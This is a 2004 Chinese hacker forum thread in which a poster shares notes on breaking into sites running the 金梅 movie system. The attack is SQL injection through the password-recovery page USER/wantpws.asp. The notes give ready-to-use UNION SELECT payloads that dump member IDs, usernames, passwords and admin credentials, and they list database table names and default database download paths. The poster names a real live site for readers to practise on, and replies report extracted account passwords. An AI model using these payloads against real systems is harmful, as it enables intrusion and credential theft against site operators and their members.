黑色海岸线论坛 - Powered by Discuz! Board

标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！ [打印本页]

作者: lamianbu 时间: 2004-5-15 15:35 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

[这个贴子最后由lamianbu在 2004/05/15 09:20pm 第 3 次编辑]

从我在265.com的黑客日记本中拷贝出，绝对珍藏！！！！！！！！
如果以后有机会，我会公开我的日记

金梅3几乎不存在了，如果有可以用
黄金眼（上篇14个后台那篇有上传的注册版）
不会用的可以看怪狗的黄金眼动画教程
或者臭要饭的写的绝世猜解SQL注入器（这可是个好东东啊）

下面的东西有些概要，基本上是看
黑客x档案 4期和 5期的总结出的笔记
针对现在网上的所有金梅版本好象都有效！！！！！！
不过那些收费站都是骗人的，里面全是盗连，坏连！！！！！！！！！
我破解了n个站点，只有几个是好的
特别注意！！！！：那些代码都是在USER/wantpws.asp 页注入的
你注册用户名： lamianbu
密码提示问题： lamianbu
密友提示答案：（填入方法1和方法2中的代码）
其实，前两项，和第三项的开头随便填的，不相同也行
我都填a的
还要注意！！！！
返回页“你的密码是”后面其实不是密码！！！！！！！！！！
比如方法2 前三次分别得到的是
id（没用）
用户名（登陆用）
密码（登陆用）

金梅4SQL注入

心情：　　 2004-5-14 21:58:26 　晴朗　星期五　　收藏：

login.asp
Register
高级管理员登录. 用名：, 密码：,

Register高级管理员登录. 用名：, 密码：,

USER/wantpws.asp
如果你忘记了自己的密码
如果你忘记了自己的密码，请在如下表单里输入你的密码提示信
息！. 你注册用户名：密码提示问题：密友提示答案：. 返回首
页.

方法1
得注册用户名：
lamianbu 'union select userid from users where oklook=3 or '0
oklook=x
0游1普2白3黄4钻（4手5钻）
得密码（可能不对应，所以推荐方法2）：
注册用户名处填用户名' or '1=1

方法2
得用户id为xxx：
lamianbu 'union select id from users where oklook=3 or '0
得id对应用户名：
lamianbu 'union select userid from users where id=xxx or '0
得id对应密码：
lamianbu 'union select password from users where id=xxx or '0

得管理员用户名：
lamianbu 'union select name from password where id>=1 or '0
得管理员密码：（金梅4有md5加密，看到的是16位乱码）
lamianbu 'union select pwd from password where id>=1 or '0
表名：金梅4为：fdg85675fd
会员版为：password
有些版本为：okwiantgo

验证管理员权限：
lamianbu 'union select flag from password where id>=1
返回1超，2高，3初，4无

login.asp
findaccount.asp
构造一个变绝对路径
findaccount.asp?name=xxx&pwd=xxx

网际快车得数据库：
movie/admin9988.asp
金梅4为：data/admin2000.asp 或 data/admin2002.asp
下载后改为admin9988.mdb

作者: lamianbu 时间: 2004-5-15 15:47 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

拿这页练练手啊
破解出黄金帐号和密码请不要修改和公布（后来人也要练手啊）
登陆进去记得走时要退出登陆（一个帐号不能几人同时用的）
http://www.westedu.org/mov/USER/wantpws.asp
更多金梅去 google 找
实际上金梅系统没有这页也可以
构造出同版本的类似页进行注入

作者: bigblock 时间: 2004-5-15 16:42 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

靠.锤子.你又从哪抄的啊?

作者: 飛鳥 时间: 2004-5-15 16:54 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

得注册用户名：
feiniao520 'union select userid from users where oklook=3 or '0
第一次得到这个:
如果你忘记了自己的密码，请在如下表单里输入你的密码提示信息！

你的密码是：111111
要保存好喔，下次不要弄丢了。

第二次用feiniao520'union select password from users where id=111111 or '0
得到:
如果你忘记了自己的密码，请在如下表单里输入你的密码提示信息！

你的密码是：loveme88
要保存好喔，下次不要弄丢了。
呜呜不行啊~~

作者: 飛鳥 时间: 2004-5-15 16:58 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

哈哈哈~~~得到自己的账号密码~~~
换了一个号的到它的密码,就是刚才的111111!!!!!~~~不知道有什么用?

作者: 飛鳥 时间: 2004-5-15 17:06 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

郁闷~~原来是个留言账号~~~一点用也没有~~

作者: 飛鳥 时间: 2004-5-15 17:36 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

哈~~~原来有点用哦 ~~好像是个留言本的管理员~~呵呵~~
lamianbu 你的密码是10?
好像无论用那条语句得到的都是密码阿? 是不是要知道它的用户名先阿?怎么得到他的用户名呢?用那些语句不行啊?~~lamianbu 'union select id from users where oklook=3 or '0 换了很多的地方也的不到ID阿?

作者: lamianbu 时间: 2004-5-15 17:45 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

[这个贴子最后由lamianbu在 2004/05/15 06:01pm 第 1 次编辑]

楼上的飞鸟注意！！！！
那写着“你的密码是”后面其实不是密码！！！！！！！！！！

“你的密码是”后面其实不是密码！！！！！！！！！！
三次分别得到的是
id（没用）
用户名（登陆用）
密码（登陆用）

作者: lamianbu 时间: 2004-5-15 17:54 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

下面引用由bigblock在 2004/05/15 04:42pm 发表的内容：
靠.锤子.你又从哪抄的啊?

上面写的很清楚，
平时总结
+
黑客x档案4期
+
5期
拜托看清楚了再发言！
不服的可以出更好的原创！
今后我不希望
跟帖有故意抬杠的！！！！！！！！！！！！！！
不是第一次了！

作者: FBI007FK 时间: 2004-5-15 18:26 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

哈哈，值得研究一下！

作者: darkeyes 时间: 2004-5-17 19:37 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

呵呵,我也写了篇此金梅的漏洞,基本上差不多!

作者: 黑色海岸线 时间: 2004-5-21 04:08 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

你们两自家兄弟干什么

作者: hahababy 时间: 2004-5-23 14:04 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

真的可以

作者: hahababy 时间: 2004-5-23 14:17 标题: [原创]金梅电影系统破解笔记----破解率80%以上！！！！！！！！

但是到了查管理员密码就不行，没显示

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)